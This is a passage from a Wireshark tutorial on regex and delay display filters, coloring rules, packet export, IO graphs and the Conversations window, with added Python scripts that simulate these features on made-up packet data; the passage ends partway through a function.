The letters "building" and "eng" are fixed, while the letter between them may be upper or lower case. The expression "building[Aa]eng" matches either form: the class [Aa] accepts "A" or "a" at that position. If you also want to accept the letter B in either case, use "building[AaBb]eng", which additionally matches buildingBeng and buildingbeng.

• Use matches for a multiple-word search

Regular expressions offer a simple way to search for several words at once: separate the alternatives with "|" inside a group. For example, to display packets that contain the string cat or the string dog, in upper or lower case, use the expression "(?i)(cat|dog)".

Note: it is worth spending time learning regular expressions (regex). Jan Goyvaerts' site http://www.regular-expressions.info/ is a good reference, and if you work with regex often, tools such as RegexBuddy and RegexMagic (also by Jan Goyvaerts) help you build and test expressions. Regular expressions are used in many other security tools as well, including Nmap and Snort.

• Use wildcards in a keyword filter

Display filters do not have a wildcard syntax of their own. Instead, wildcards come from regular expressions used with the `matches` operator.
• Use the regex wildcard (.)

In regular expressions the dot "." is a wildcard that matches any single character except a line break. To match a literal "." you must escape it with a backslash ("\"). With the `matches` operator, the following filter displays FTP requests whose argument contains "me", any one character, and then "r":

ftp.request.arg matches "me.r"

For example:

[Screenshot: with this filter applied, frame 3365 from 10.234.125.254 to 10.121.70.151 is displayed as "FTP Request: PASS symmetry"; the argument symmetry contains the sequence m-e-t-r, which "me.r" matches.]

To require two characters between "me" and "r", add a second wildcard: ftp.request.arg matches "me..r". A quantifier in curly braces sets how many times the wildcard may repeat: ftp.request.arg matches "me.{1,3}r" matches "me", then one to three characters of any kind, then "r".
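The following Python script is an added example, not code from the original book; it shows how the `contains` and `matches` filters discussed above behave when evaluated against a constructed list of FTP argument values (the frame numbers and strings are invented for the example). Python's `re` module accepts the same `(?i)` flag, character classes, alternation, "." wildcard and `{m,n}` quantifier syntax used in the filters, so the results match what Wireshark displays for those filters; the function names are the example's own.

```python
import re

# Constructed sample: (frame number, value of ftp.request.arg). Not a real capture.
FTP_ARGS = [
    (1, "anonymous"),
    (2, "admin"),
    (3, "Admin"),
    (4, "ADMIN@example.org"),
    (5, "symmetry"),      # "me.r" matches the m-e-t-r inside it
    (6, "buildingAeng"),
    (7, "buildingaeng"),
    (8, "buildingBeng"),
    (9, "cat_pictures"),
    (10, "DOG.jpg"),
    (11, "meter"),        # "me..r" and "me.{1,3}r" match m-e-t-e-r
]


def contains(field_value: str, needle: str) -> bool:
    """Wireshark's `contains`: a case-sensitive substring test."""
    return needle in field_value


def matches(field_value: str, pattern: str) -> bool:
    """Wireshark's `matches`: an unanchored PCRE search over the field."""
    return re.search(pattern, field_value) is not None


def apply_filter(op, arg: str, rows=FTP_ARGS):
    """Return the frame numbers whose ftp.request.arg satisfies the filter."""
    return [frame for frame, value in rows if op(value, arg)]


# The filters from the text, as (operator, argument) pairs.
FILTERS = {
    'ftp.request.arg contains "admin"':            (contains, "admin"),
    'ftp.request.arg matches "(?i)admin"':         (matches, "(?i)admin"),
    'ftp.request.arg matches "building[Aa]eng"':   (matches, "building[Aa]eng"),
    'ftp.request.arg matches "building[AaBb]eng"': (matches, "building[AaBb]eng"),
    'ftp.request.arg matches "(?i)(cat|dog)"':     (matches, "(?i)(cat|dog)"),
    'ftp.request.arg matches "me.r"':              (matches, "me.r"),
    'ftp.request.arg matches "me..r"':             (matches, "me..r"),
    'ftp.request.arg matches "me.{1,3}r"':         (matches, r"me.{1,3}r"),
}


def run_all():
    """Evaluate every filter and return {filter text: [matching frames]}."""
    return {text: apply_filter(op, arg) for text, (op, arg) in FILTERS.items()}


if __name__ == "__main__":
    for text, frames in run_all().items():
        print(f"{text:48} -> frames {frames}")
```

Note that the case-sensitive `contains "admin"` selects only frame 2, while `matches "(?i)admin"` also selects frames 3 and 4; "me.r" matches symmetry but not meter, because exactly one character is allowed between "me" and "r".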

• Use filters to spot communication delays

Delays are one of the main reasons users complain that the network is slow. Wireshark's time measurements help you find the large gaps between packets in a trace file.

• Filter on large delta times (frame.time_delta)

The frame.time_delta field holds the time since the previous captured frame. A filter such as frame.time_delta > 1 displays every frame that arrived more than one second after the frame before it. Keep in mind that this delta is measured between consecutive frames in the trace regardless of the conversation they belong to, so a large value may simply mean that the trace mixes many conversations. If you want to see delays inside a single UDP or TCP conversation, first filter on that conversation (for example with the Conversations window or a filter on its addresses and ports), save the displayed packets with File | Export Specified Packets, open the new file and then apply the frame.time_delta filter.

• Filter on large TCP delta times (tcp.time_delta)

The tcp.time_delta field is only available when the TCP preference "Calculate conversation timestamps" is enabled. To enable it, open Edit | Preferences, expand Protocols, select TCP and check the "Calculate conversation timestamps" setting. Wireshark then tracks the time since the previous frame in the same TCP stream and shows it under [Timestamps] in the TCP section of each packet's details, so tcp.time_delta > 1 finds the TCP conversations that paused for more than a second, whatever other traffic was captured in between.
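The script below is an added example (not code from the original book or from Wireshark) that reproduces the two time measurements over a constructed packet list: frame.time_delta, computed between consecutive captured frames, and tcp.time_delta, computed between frames of the same TCP stream as "Calculate conversation timestamps" does. The addresses, ports and timestamps are invented; the function names are the example's own. It shows why the two filters answer different questions.

```python
from collections import namedtuple

# Constructed packets (not a real capture): frame number, absolute time in seconds,
# protocol, and the 4-tuple (src, sport, dst, dport) for TCP frames (None otherwise).
Packet = namedtuple("Packet", "frame time proto stream")

PACKETS = [
    Packet(1, 0.000, "TCP", ("10.0.0.5", 51000, "93.184.216.34", 80)),
    Packet(2, 0.020, "TCP", ("93.184.216.34", 80, "10.0.0.5", 51000)),
    Packet(3, 0.021, "TCP", ("10.0.0.5", 51000, "93.184.216.34", 80)),
    Packet(4, 0.600, "DNS", None),                                      # unrelated traffic
    Packet(5, 1.300, "DNS", None),
    Packet(6, 2.900, "TCP", ("93.184.216.34", 80, "10.0.0.5", 51000)),  # server answered late
    Packet(7, 2.901, "TCP", ("10.0.0.5", 51000, "93.184.216.34", 80)),
    Packet(8, 4.500, "TCP", ("10.0.0.5", 51001, "203.0.113.9", 443)),   # first frame of a new stream
]


def stream_key(stream):
    """Direction-independent key for a TCP conversation (None for non-TCP frames)."""
    if stream is None:
        return None
    a, b = (stream[0], stream[1]), (stream[2], stream[3])
    return tuple(sorted([a, b]))


def frame_time_delta(packets):
    """frame.time_delta: seconds since the previous *captured* frame, whatever
    conversation it belongs to (0 for the first frame)."""
    deltas, prev = {}, None
    for p in packets:
        deltas[p.frame] = 0.0 if prev is None else round(p.time - prev.time, 6)
        prev = p
    return deltas


def tcp_time_delta(packets):
    """tcp.time_delta: seconds since the previous frame in the same TCP stream.
    Non-TCP frames have no value, just as in Wireshark."""
    last_seen, deltas = {}, {}
    for p in packets:
        key = stream_key(p.stream)
        if key is None:
            continue
        deltas[p.frame] = 0.0 if key not in last_seen else round(p.time - last_seen[key], 6)
        last_seen[key] = p.time
    return deltas


def frames_over(deltas, threshold=1.0):
    """Equivalent of the display filters frame.time_delta > 1 and tcp.time_delta > 1."""
    return sorted(f for f, d in deltas.items() if d > threshold)


if __name__ == "__main__":
    print("frame.time_delta > 1:", frames_over(frame_time_delta(PACKETS)))
    print("tcp.time_delta   > 1:", frames_over(tcp_time_delta(PACKETS)))
```

Frame 8 is selected by frame.time_delta > 1 although it is only the start of a new connection, while frame 6, a real 2.879 s pause in the HTTP stream, shows up with a frame delta of just 1.6 s because two DNS frames were captured during the pause; tcp.time_delta reports the pause correctly and ignores frame 8.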



[Screenshot: the filter tcp.time_delta > 1 applied. Frames 2671 and 23911, from 216.239.116.76 to 192.168.1.64, are displayed as "HTTP Continuation or non-HTTP traffic", and another frame in the same stream is marked [TCP Retransmission]. In the packet details, the TCP section of the selected frame shows [SEQ/ACK analysis] and, under [Timestamps], "[Time since previous frame in this TCP stream: ...]". Profile: wireshark101.]

• Create a filter expression button

After typing a display filter, click the Save button to the right of the filter area. Wireshark asks for a label: enter a short name for the filter and click OK, and a button with that name appears to the right of the Save button. Clicking the button applies the saved filter.

[Screenshot: the "Wireshark: Save Filter" dialog.]

There is no limit to the number of filter expression buttons you can create. If you create more buttons than fit in the width of the window, a "»" symbol appears at the end of the button row; click it to see the remaining buttons.

In the following example, filter expression buttons were created for HTTP request methods and response codes (GET|POST, CONNECT, HEAD, HTTP3xx, HTTP4xx and HTTP5xx). Because they do not all fit, Wireshark shows the GET|POST button followed by "»", and the rest of the buttons appear in a drop-down list.

[Screenshot: the filter toolbar with the GET|POST button visible and the overflow list showing CONNECT, HEAD, HTTP4xx, HTTP5xx and HTTP3xx; the packet list behind it shows DNS standard queries and responses and a TCP SYN/ACK.]
• Edit, reorder, delete, and disable filter expression buttons

Once you have clicked Save and created a button, there is no edit option on the button itself. To change, reorder, delete or disable a Filter Expression button, open Edit | Preferences and select Filter Expressions, as shown in the following figure.

[Screenshot: the Filter Expressions preference page. The list is displayed as buttons to the right of the Save button; drag and drop entries to change the order. Columns: Enabled, Label, Filter Expression.]

  Enabled  Label     Filter Expression
  [x]      CONNECT   http.request.method == "CONNECT"
  [x]      HEAD      http.request.method == "HEAD"
  [x]      HTTP4xx   http.response.code > 399 && http.response.code < 500
  [x]      HTTP5xx   http.response.code > 499
  [x]      HTTP3xx   http.response.code > 299 && http.response.code < 400
• Color and export interesting packets

Wireshark's coloring rules give packets a foreground and background color based on a display filter, so the packets you care about stand out in the packet list. Once you have found them, you can also export them to a separate trace file.

[Screenshot: the Coloring Rules window (View | Coloring Rules) for profile wireshark101. The list is processed in order until a match is found; the entries shown include "Spanning Tree Topology Change" (stp.type == 0x80) and "OSPF State Change" (ospf.msg != 1), and a new rule with the string frame.time_delta > 1 || tcp.time_delta > 1 has been added. Buttons: New, Edit, Enable, Disable, Delete, Manage, Clear; Display Colors; Status.]

Points to remember about the Coloring Rules window:
- Rules are applied from the top of the list down; the first rule whose filter matches a packet determines its color.
- The rules are saved in the colorfilters file of the current profile.
- Foreground and background colors are chosen from the Pango color set.
- The Expression button helps you build the filter string of a rule.

To see which coloring rule was applied to a packet, expand the Frame section in the packet details: the Coloring Rule Name and Coloring Rule String lines show the rule and its filter, as in the following figure.



[Screenshot: frame 1200, an ICMP "Destination unreachable" from 192.168.1.123 to 192.168.1.141, with the Frame section expanded. The frame fields include Arrival Time: Jan 10, 2006 10:55:35.100541000 Pacific Standard Time; [Time delta from previous captured frame: 0.000013000 seconds]; [Time delta from previous displayed frame: 0.000013000 seconds]; Frame Number: 1200; Frame Length: 72 bytes (576 bits); [Frame is marked: False]; [Frame is ignored: False]; [Coloring Rule Name: ICMP errors]; [Coloring Rule String: icmp.type eq 3 || icmp.type eq 4 || icmp.type ...]. Status bar: Displayed: 2031; Profile: wireshark101.]

Note: the coloring rules are stored in a file called colorfilters. You can edit this file with a text editor, but it belongs to the profile in use, so look for it in that profile's directory (the Profile entry in the status bar shows which profile is active) rather than in the global configuration.

• Turn off the checksum error coloring rule

If the packets sent by your own host are marked with TCP, UDP or IP checksum errors even though you know they reach their destination, the machine is almost certainly using task offloading: the checksum is calculated by the network interface card after the packet has been handed to the capture driver, so Wireshark sees an incomplete (invalid) checksum in the outbound frames while the frames on the wire carry a valid one. Because the inbound frames have valid checksums, the coloring only adds noise. Disable the checksum error coloring rule, or disable checksum validation in the TCP, UDP and IP protocol preferences.

• Disable individual coloring rules

Select the coloring rule you want to turn off in View | Coloring Rules and click Disable. The rule stays in the list, marked as disabled, and can be enabled again later.

If you want to turn off packet coloring entirely, open the View menu and clear Colorize Packet List (or click the Colorize Packet List button on the main toolbar).
• Build a coloring rule to highlight delays

The following procedure creates a coloring rule that highlights delays in TCP and UDP conversations. The rule is based on the filters used above to spot large delta times, so a packet that was preceded by a long gap (a high delta time) stands out in the packet list.

Give the rule a descriptive name so you recognize it later.

From the View menu select Coloring Rules, then click New; the Edit Color Filter dialog appears, as in the following figure.

[Screenshot: the "Wireshark: Edit Color Filter - Profile: wireshark101" dialog with the Name field filled in and String: frame.time_delta > 1 || tcp.time_delta > 1, followed by the Foreground Color... and Background Color... buttons.]
Wireshark's color picker is based on the Pango library. The list of color names comes from Pango's color table, https://git.gnome.org/browse/pango/tree/pango/pango-color-table.h, which in turn is derived from the X11 "rgb.txt" color list; the names are documented at http://en.wikipedia.org/wiki/X11_color_names. You do not have to pick a color from the color wheel: click Background Color..., type a color name such as orange into the Color Name field and press Tab (or Enter). Wireshark replaces the name with its hex value (orange becomes #FFA500). Click OK.

[Screenshot: the color selection dialog with the note "Enter a color name and press Tab. Wireshark will replace the name with the hex value.", beside the Edit Color Filter dialog with String: frame.time_delta > 1 || tcp.time_delta > 1 and the Foreground Color... and Background Color... buttons.]

You can also create a coloring rule directly from a field in the packet details: right-click the field and select Colorize with Filter | New Coloring Rule, as in the following figure.







[Screenshot: right-clicking the "PASS merlin" argument of an FTP request (frame 11, 10.234.125.254 to 10.121.70.151, which follows the server's "331 Passwo..." response in frame 10) opens the packet details context menu: Expand All, Collapse All, Apply as Column, Apply as Filter, Prepare a Filter, Colorize with Filter, Follow TCP Stream, Follow UDP Stream, Follow SSL Stream, Copy, Export Selected Packet Bytes..., Wiki Protocol Page, Filter Field Reference, Protocol Preferences, Decode As..., Disable Protocol..., Resolve Name, Go to Corresponding Packet.]
• Quickly colorize a single conversation

To make one conversation stand out quickly, right-click any packet of that conversation in the packet list, select Colorize Conversation, choose the conversation type (for example TCP) and pick one of the ten colors, as shown in the following figure. This coloring is temporary: it is not written to the colorfilters file, so it is lost when you switch to another profile or restart Wireshark. To remove it, select View | Reset Coloring 1-10.

[Screenshot: the packet list context menu in an HTTP trace: Mark Packet (toggle), Ignore Packet (toggle), Set Time Reference (toggle), Time Shift..., Edit or Add Packet Comment..., Manually Resolve Address, Apply as Filter, Prepare a Filter, Conversation Filter, Colorize Conversation (with a submenu of conversation types including TCP), SCTP, Follow TCP Stream, Follow UDP Stream, Follow SSL Stream, Copy, Decode As..., Print..., Show Packet in New Window. The packet list shows a TCP/HTTP conversation between 24.6.173.220 and 208.93.142.190 (SYN/ACK, GET / HTTP/1.1, HTTP/1.1 503 Service ...) and a DNS standard query to 75.75.76.76.]

View | Reset Coloring 1-10

• Export packets that interest you

After you have found the packets of interest, for example a set of conversations or all the traffic to and from one host, you can save them to a separate trace file. Apply a display filter (for example tcp.port == 80 for TCP port 80 traffic), then select File | Export Specified Packets, as in the following figure.

[Screenshot: the "Wireshark: Export Specified Packets" dialog, with Packet Range options Captured/Displayed, All packets, Selected packet, Marked packets, First to last marked, Range, and Remove Ignored packets.]

If the packets you want to save cannot be described by a single display filter, mark them before you choose File | Export Specified Packets. Right-click a packet in the packet list and select Mark Packet (toggle), or press Ctrl+M, and repeat for each packet you want. Then select File | Export Specified Packets and choose Marked packets or First to last marked in the Packet Range area.

Packet marking is temporary: the marks only exist while the trace file is open, so they are not saved with the exported file. The Captured and Displayed columns of the dialog tell you how many packets each option will save.
• Export packet details

Select File | Export Packet Dissections to export packet details, as shown in the following figure. Several formats are available, including plain text and CSV (comma separated values).

[Screenshot: the File menu with Export Packet Dissections expanded: as "Plain Text" file..., as "PostScript" file..., as "CSV" (Comma Separated Values packet summary) file..., as "C Arrays" (packet bytes) file..., as "PSML" XML (packet summary) file..., as "PDML" XML (packet details) file... Behind it, the packet list of a TCP/HTTP conversation between 192.168.1.182 and 161.58.73.170, with frame 4 (321 bytes, source port cplscrambler-al (1088), destination port http (80)) selected.]

Choose the plain text format when you want the packet summary line, the packet details (all collapsed, as displayed, or all expanded) and the packet bytes (the hex and ASCII dump) in one readable file. Choose CSV when you want to load the packet summary lines into a spreadsheet and analyze them there. In the export dialog, the Packet Range area lets you choose the captured or displayed packets, the selected packet, the marked packets or a range, and the Packet Format area lets you choose which of the three parts (summary line, details, bytes) to include.

[Screenshot: the Packet Range and Packet Format areas of the export dialog: Captured 359 / Displayed 1 packets, Selected packet chosen; Packet summary line, Packet details (as displayed) and Packet bytes check boxes.]

The following is an example of a plain text export of the selected packet's details:

Frame 4: 321 bytes on wire (2568 bits), 321 bytes captured (2568 bits) on interface 0 
Ethernet II, Src: AmbitMic_0b:b9:44 (00:d0:59:0b:b9:44), Dst: LinksysG_df:80:c7 (00:04:5a:df:80:c7) 
Internet Protocol Version 4, Src: 192.168.1.182 (192.168.1.182), Dst: 161.58.73.170 (161.58.73.170) 
Transmission Control Protocol, Src Port: cplscrambler-al (1088), Dst Port: http (80), Seq: 1, Ack: 1, Len: 267 
Hypertext Transfer Protocol
GET / HTTP/1.1\r\n
Accept: */*\r\n
Accept-Language: en-us\r\n
Accept-Encoding: gzip, deflate\r\n
If-Modified-Since: Sat, 16 Mar 2002 07:16:37 GMT; length=69556\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\r\n
Host: www.packet-level.com\r\n
Connection: Keep-Alive\r\n
\r\n
[Full request URI: http://www.packet-level.com/]

An example of a packet summary export in CSV format:

"No.","Time","Source","Destination","Protocol","Length","Info"
"2","0.251957000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com"
"3","1.252833000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com"
"4","1.253087000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com"
"5","2.252841000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com"
"6","2.252903000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com"
"8","4.252909000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com"
"9","4.252977000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com"
"10","8.253355000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com"
"11","8.253600000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com"
"12","8.298331000","75.75.75.75","24.6.173.220","DNS","93","Standard query response 0x5451 A 198.66.239.146"
"24","8.449268000","24.6.173.220","75.75.75.75","DNS","84","Standard query 0xc16e A www.google-analytics.com"
"25","8.465908000","75.75.75.75","24.6.173.220","DNS","304","Standard query response 0xc16e CNAME www-google-analytics.l.google.com A 74.125.224.128 A 74.125.224.130 A 74.125.224.133 A 74.125.224.129 A 74.125.224.142 A 74.125.224.131 A 74.125.224.135 A 74.125.224.132 A 74.125.224.137 A 74.125.224.134 A 74.125.224.136"
"26","8.466750000","24.6.173.220","75.75.75.75","DNS","84","Standard query 0x9111 AAAA www.google-analytics.com"
"27","8.478874000","75.75.75.75","24.6.173.220","DNS","156","Standard query response 0x9111 CNAME www-google-analytics.l.google.com AAAA 2001:4860:4001:803::1006"

Once exported, the CSV file can be opened in a spreadsheet program such as Excel for further analysis:
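The CSV export is useful for more than spreadsheets. The script below is an added example (not from the original book or from Wireshark) that reads a packet summary CSV with Python's standard `csv` module and does the kind of analysis you would otherwise do by hand in Excel: it groups the DNS rows by transaction ID, counts how many times the client had to repeat each query, which servers it tried, and how long it waited for the answer. The embedded rows are a constructed sample modelled on the export above; the function names are the example's own.

```python
import csv
import io
import re

# Constructed sample in the format of File | Export Packet Dissections | as "CSV",
# modelled on the export shown above (not a real capture).
CSV_TEXT = '''"No.","Time","Source","Destination","Protocol","Length","Info"
"2","0.251957000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com"
"3","1.252833000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com"
"4","1.253087000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com"
"5","2.252841000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com"
"6","2.252903000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com"
"8","4.252909000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com"
"9","4.252977000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com"
"10","8.253355000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com"
"11","8.253600000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com"
"12","8.298331000","75.75.75.75","24.6.173.220","DNS","93","Standard query response 0x5451 A 198.66.239.146"
"24","8.449268000","24.6.173.220","75.75.75.75","DNS","84","Standard query 0xc16e A www.google-analytics.com"
"25","8.465908000","75.75.75.75","24.6.173.220","DNS","304","Standard query response 0xc16e CNAME www-google-analytics.l.google.com A 74.125.224.128"
"26","8.466750000","24.6.173.220","75.75.75.75","DNS","84","Standard query 0x9111 AAAA www.google-analytics.com"
"27","8.478874000","75.75.75.75","24.6.173.220","DNS","156","Standard query response 0x9111 CNAME www-google-analytics.l.google.com AAAA 2001:4860:4001:803::1006"
'''

# The Info column of a DNS row starts with "Standard query [response] 0x<txid>".
DNS_RE = re.compile(r"Standard query (response )?0x([0-9a-f]{4})")


def load_rows(text=CSV_TEXT):
    """Parse the export into a list of dicts keyed by the CSV header names."""
    return list(csv.DictReader(io.StringIO(text)))


def dns_transactions(rows):
    """Group DNS rows by transaction ID: how often the query was sent, to which
    servers, and the delay from the first query to the first response."""
    tx = {}
    for row in rows:
        if row["Protocol"] != "DNS":
            continue
        m = DNS_RE.search(row["Info"])
        if not m:
            continue
        is_response, txid = bool(m.group(1)), m.group(2)
        t = float(row["Time"])
        e = tx.setdefault(txid, {"name": None, "queries": 0, "servers": set(),
                                 "first": None, "response": None})
        if is_response:
            if e["response"] is None:
                e["response"] = t
        else:
            e["queries"] += 1
            e["servers"].add(row["Destination"])
            if e["first"] is None:
                e["first"] = t
                e["name"] = row["Info"].split()[-1]   # queried name is the last token
    for e in tx.values():
        e["answer_delay"] = None if e["response"] is None else round(e["response"] - e["first"], 6)
    return tx


def slow_lookups(tx, min_retries=2):
    """Transactions the client had to repeat more than min_retries times: a delay
    attributed to the resolver rather than to an arbitrary gap between frames."""
    return {txid: e for txid, e in tx.items() if e["queries"] > min_retries}


if __name__ == "__main__":
    for txid, e in dns_transactions(load_rows()).items():
        print(f"0x{txid} {e['name']}: sent {e['queries']}x to {sorted(e['servers'])}, "
              f"answered after {e['answer_delay']} s")
```

On the sample, transaction 0x5451 for www.chappellu.com was sent nine times, alternating between 75.75.75.75 and 75.75.76.76, before an answer arrived about 8 seconds after the first query; the two google-analytics lookups were answered on the first try within a few milliseconds. That eight-second wait is the kind of delay a user experiences as "the web site is slow", and it happened before the TCP connection even started.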



[Screenshot: hostinformation.csv opened in Microsoft Excel. Columns: No., TCP Delta, Source, Destination, Protocol, Length, Host. The rows are HTTP requests from 24.6.173.220 to 72.21.91.19 (Host: assets.zendesk.com) and to 50.57.113.49 (Host: domainnames.com.au), with TCP delta values such as 0.000494, 0.001361, 0.063205 and 0.233015 seconds and lengths between 334 and 413 bytes, so the requests that waited longest on their TCP stream can be sorted out in the spreadsheet.]
• Build and interpret tables and graphs

Wireshark's statistics windows and graphs turn a packet list into tables and pictures. An IO graph can show, for example, how many DNS queries, TCP SYNs or TCP RSTs were seen per second, and the Conversations and Endpoints tables show who talked to whom and how much. This section walks through the most useful of these tools.

• Quick reference: IO graph interface

[Screenshot: "Wireshark IO Graphs: http-download101d.pcapng", annotated with the numbered elements below.]

1. Graph area (X axis): the horizontal axis shows time from the start of the trace (in seconds or as time of day).
2. Graph area (Y axis): the vertical axis shows the selected unit (packets, bytes or bits per tick, or an advanced calculation).
3. Graph buttons: each of the five graphs (Graph 1 to Graph 5) has its own button to turn its line on or off.
4. Filter area: the display filter applied to each graph, so each line can show a different subset of the traffic (an empty filter means all traffic).
5. Graph style: Line, Impulse, FBar (floating bar) or Dot.
6. X axis: the tick interval and pixels per tick, and the Time of Day format option to show wall-clock time instead of seconds since the start of the trace.
7. Y axis: the unit (Packets/Tick, Bytes/Tick, Bits/Tick or Advanced) and the scale of the IO graph.
8. Copy: copies the graph's data to the clipboard in CSV format.
9. Save: saves the graph as an image (.png, .bmp, .jpeg or .tiff).

Two of the most useful statistics windows are Conversations and Endpoints.

• Check out network conversations

The Conversations window lists each pair of communicating addresses (or address and port pairs) and the traffic between them. Open it with Statistics | Conversations. Tabs along the top select the conversation type (Ethernet, IPv4, IPv6, TCP, UDP and others, each showing the number of conversations found); the TCP tab, for example, lists every TCP conversation in the trace.
[Screenshot: the Conversations window, TCP tab (63 conversations), with columns Address A, Port A, Address B, Port B, Packets, Bytes, Packets A→B, Bytes A→B, Packets B→A, Bytes B→A, Rel Start and Duration. Almost all rows are HTTP conversations between 24.6.173.220 (client ports 19943 to 19991) and servers in the 164.44.222.0/24 range (for example 164.44.222.46 and 164.44.222.120) plus 66.71.216.176 and 74.125.224.59, sorted with the busiest conversation at the top. Check boxes: Name resolution, Limit to display filter; buttons: Copy, Follow Stream, Graph A→B, Graph B→A, Close.]
Check Name resolution to see host names instead of addresses (this needs name resolution to be enabled and may trigger DNS lookups, so it is off by default). When you are hunting for the slowest or longest conversations, the Relative Start (Rel Start) and Duration columns are the ones to sort on: Rel Start is the time, relative to the first packet in the trace, at which the conversation's first packet was seen, and Duration is the time from the conversation's first packet to its last.

If a display filter is applied in the main window, check Limit to display filter to restrict the table to the displayed packets only.

The Follow Stream button (available for TCP and UDP conversations) reassembles the data exchanged in the selected conversation and shows it in the Follow Stream window.

• Quickly filter on conversations

Right-click a row in the Conversations window and choose Apply as Filter or Prepare a Filter. A submenu lets you choose whether the filter selects those packets (Selected) or excludes them (Not Selected), or combines the choice with the filter already in the filter area (... and Selected, ... or Selected, ... and not Selected, ... or not Selected); a second submenu chooses the direction, for example A↔B (both directions), A→B or B→A. "A" stands for the address (and port) in the Address A column and "B" for the one in Address B. For a row on the IPv4 or IPv6 tab the filter uses the addresses only; for a row on the TCP or UDP tab it also includes the ports, so it selects exactly that conversation. The following figure shows an example.


[Screenshot: right-clicking a TCP conversation (24.6.173.220 port 19961 to 74.125.224.59 http) in the Conversations window and choosing Apply as Filter | Selected | A↔B; the submenu lists Selected, Not Selected, ... and Selected, ... or Selected, ... and not Selected, ... or not Selected. The Limit to display filter check box and the Copy, Follow Stream and Close buttons are visible at the bottom of the window.]
• Locate the top talkers

When the network is slow, or when you simply want to know which hosts generate most of the traffic, you need to find the conversations that consume the bandwidth (and then find out why). The Conversations window answers that question directly.

Select Statistics | Conversations | IPv4 (or IPv6) and click the Bytes column header to sort the table by bytes; the conversation at the top is the one consuming the most bandwidth. Use the Endpoints window in the same way when you want the busiest single host rather than the busiest pair, and if you already know which host you are interested in, filter on its address first and check Limit to display filter so the table only covers that host's conversations.
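The following script is an added example (not code from the original book or from Wireshark) that serves both the Conversations discussion above and the top-talkers question here: it builds the Conversations table from a constructed packet list, for the IPv4 tab (address pairs) and for the TCP or UDP tab (address and port pairs), with the same columns Wireshark shows (packets and bytes in each direction, Rel Start, Duration), sorts it by bytes to find the top talker, and produces the display filter that Apply as Filter builds for the A↔B, A→B and B→A directions. The addresses, ports and sizes are invented and the function names are the example's own.

```python
# Constructed sample packets (not a real capture):
# (frame, time, proto, src, sport, dst, dport, length in bytes)
PACKETS = [
    (1,  0.000, "tcp", "24.6.173.220", 19943, "164.44.222.46", 80,  66),
    (2,  0.030, "tcp", "164.44.222.46", 80,  "24.6.173.220", 19943, 66),
    (3,  0.031, "tcp", "24.6.173.220", 19943, "164.44.222.46", 80,  343),
    (4,  0.090, "tcp", "164.44.222.46", 80,  "24.6.173.220", 19943, 1514),
    (5,  0.091, "tcp", "164.44.222.46", 80,  "24.6.173.220", 19943, 1514),
    (6,  0.120, "tcp", "24.6.173.220", 19961, "74.125.224.59", 80,  66),
    (7,  0.150, "tcp", "74.125.224.59", 80,  "24.6.173.220", 19961, 66),
    (8,  0.151, "tcp", "24.6.173.220", 19961, "74.125.224.59", 80,  400),
    (9,  0.200, "tcp", "74.125.224.59", 80,  "24.6.173.220", 19961, 518),
    (10, 0.250, "udp", "24.6.173.220", 54321, "75.75.76.76",  53,  71),
    (11, 0.262, "udp", "75.75.76.76",  53,  "24.6.173.220", 54321, 87),
    (12, 2.500, "tcp", "164.44.222.46", 80,  "24.6.173.220", 19943, 1514),
]


def _endpoint_order(ep):
    # Sort key: the lower address becomes Address A; the port only breaks ties.
    return (ep[0], ep[1] or 0)


def conversations(packets, tab="tcp"):
    """Build the Conversations table for one tab.
    tab="ipv4" groups by address pair only; tab="tcp" or "udp" groups by the
    address+port pairs of that transport protocol. Returns {key: row}."""
    table = {}
    for frame, t, proto, src, sport, dst, dport, length in packets:
        if tab == "ipv4":
            a, b = (src, None), (dst, None)
        elif proto == tab:
            a, b = (src, sport), (dst, dport)
        else:
            continue
        a, b = sorted([a, b], key=_endpoint_order)   # conversation is direction-independent
        key = (tab, a, b)
        row = table.setdefault(key, {"packets": 0, "bytes": 0,
                                     "a_to_b_pkts": 0, "a_to_b_bytes": 0,
                                     "b_to_a_pkts": 0, "b_to_a_bytes": 0,
                                     "rel_start": t, "last": t})
        row["packets"] += 1
        row["bytes"] += length
        if (src, None if tab == "ipv4" else sport) == a:
            row["a_to_b_pkts"] += 1
            row["a_to_b_bytes"] += length
        else:
            row["b_to_a_pkts"] += 1
            row["b_to_a_bytes"] += length
        row["rel_start"] = min(row["rel_start"], t)
        row["last"] = max(row["last"], t)
    for row in table.values():
        row["duration"] = round(row["last"] - row["rel_start"], 6)  # first to last packet
    return table


def top_talkers(table, n=3):
    """Sort by the Bytes column, descending, like clicking the column header."""
    return sorted(table.items(), key=lambda kv: kv[1]["bytes"], reverse=True)[:n]


def conversation_filter(key, direction="A<->B"):
    """The display filter built by Apply as Filter | Selected for a row, in the
    chosen direction (A<->B, A->B or B->A)."""
    tab, (addr_a, port_a), (addr_b, port_b) = key
    if tab == "ipv4":                      # IPv4 tab: addresses only
        if direction == "A<->B":
            return f"ip.addr=={addr_a} && ip.addr=={addr_b}"
        src, dst = (addr_a, addr_b) if direction == "A->B" else (addr_b, addr_a)
        return f"ip.src=={src} && ip.dst=={dst}"
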